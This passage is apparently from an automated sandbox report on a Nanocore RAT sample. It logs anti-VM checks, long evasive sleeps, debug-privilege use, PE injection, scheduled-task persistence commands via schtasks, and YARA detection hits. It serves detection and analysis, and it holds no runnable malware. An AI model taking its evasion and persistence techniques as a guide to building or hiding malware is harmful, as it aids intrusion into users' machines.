Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.2090289398.000000000240A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2209835071.00000000023AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2211026677.000000000226A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: cat464923.exe, 00000004.00000002.2090289398.000000000240A000.00000004.00000001.sdmp, cat464923.exe, 0000000B.00000002.2211026677.000000000226A000.00000004.00000001.sdmp, smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: cat464923.exe, 00000004.00000002.2090289398.000000000240A000.00000004.00000001.sdmp, cat464923.exe, 0000000B.00000002.2211026677.000000000226A000.00000004.00000001.sdmp, smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\cat464923.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Roaming\cat464923.exe Window / User API: threadDelayed 7770 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Window / User API: threadDelayed 1932 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Window / User API: foregroundWindowGot 501 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2448 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 2340 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 2656 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 3020 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 2488 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 2512 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 2344 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 2936 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 3044 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2240 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2292 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2220 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 2448 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2808 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2568 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\cat464923.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: vmware
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory written: C:\Users\user\AppData\Roaming\cat464923.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory written: C:\Users\user\AppData\Roaming\cat464923.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory written: C:\Program Files (x86)\SMTP Service\smtpsvc.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory written: C:\Program Files (x86)\SMTP Service\smtpsvc.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\cat464923.exe C:\Users\user\AppData\Roaming\cat464923.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Users\user\AppData\Roaming\cat464923.exe {path} Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp60E5.tmp' Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp4F5A.tmp' Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\cat464923.exe C:\Users\user\AppData\Roaming\cat464923.exe 0 Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Users\user\AppData\Roaming\cat464923.exe {path} Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path} Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path} Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path} Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path} Jump to behavior
Source: cat464923.exe, 00000005.00000002.2348187479.0000000002522000.00000004.00000001.sdmp Binary or memory string: Program Manager480m<RX
Source: cat464923.exe, 00000005.00000002.2350970656.00000000029C2000.00000004.00000001.sdmp, taskeng.exe, 0000000A.00000002.2347157070.00000000008B0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: cat464923.exe, 00000005.00000002.2347908257.0000000000CB0000.00000002.00000001.sdmp, taskeng.exe, 0000000A.00000002.2347157070.00000000008B0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: cat464923.exe, 00000005.00000002.2348187479.0000000002522000.00000004.00000001.sdmp Binary or memory string: Program Manager480m<+W
Source: cat464923.exe, 00000005.00000002.2348187479.0000000002522000.00000004.00000001.sdmp Binary or memory string: Program Manager480m
Source: cat464923.exe, 00000005.00000002.2352118434.00000000057FC000.00000004.00000001.sdmp Binary or memory string: kProgram Manager
Source: cat464923.exe, 00000005.00000002.2348187479.0000000002522000.00000004.00000001.sdmp Binary or memory string: Program Manager480m0
Source: cat464923.exe, 00000005.00000002.2347908257.0000000000CB0000.00000002.00000001.sdmp, taskeng.exe, 0000000A.00000002.2347157070.00000000008B0000.00000002.00000001.sdmp Binary or memory string: !Progman
Source: cat464923.exe, 00000005.00000002.2348265512.00000000025C2000.00000004.00000001.sdmp Binary or memory string: Program Manager480mx
Source: cat464923.exe, 00000005.00000002.2350970656.00000000029C2000.00000004.00000001.sdmp Binary or memory string: Program ManagerTV0m
Source: cat464923.exe, 00000005.00000002.2348265512.00000000025C2000.00000004.00000001.sdmp Binary or memory string: Program Manager480ma
Source: cat464923.exe, 00000005.00000002.2348265512.00000000025C2000.00000004.00000001.sdmp Binary or memory string: Program Manager480mPvf
Source: cat464923.exe, 00000005.00000002.2348265512.00000000025C2000.00000004.00000001.sdmp Binary or memory string: Program Manager480m|

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\cat464923.exe Queries volume information: C:\Users\user\AppData\Roaming\cat464923.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Queries volume information: C:\Users\user\AppData\Roaming\cat464923.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Queries volume information: C:\Users\user\AppData\Roaming\cat464923.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Queries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Queries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Queries volume information: C:\Users\user\AppData\Roaming\cat464923.exe VolumeInformation
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Queries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Queries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\cat464923.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Nanocore RAT
Source: Yara match File source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2348105483.0000000002491000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY
Source: Yara match File source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e019c.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.33547c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e47c5.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.335019c.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d019c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Detected Nanocore Rat
Source: cat464923.exe, 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: cat464923.exe, 00000005.00000002.2347454023.0000000000440000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: cat464923.exe, 00000005.00000002.2347454023.0000000000440000.00000004.00000001.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: cat464923.exe, 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: smtpsvc.exe, 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Yara detected Nanocore RAT
Source: Yara match File source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2348105483.0000000002491000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp, type: MEMORY
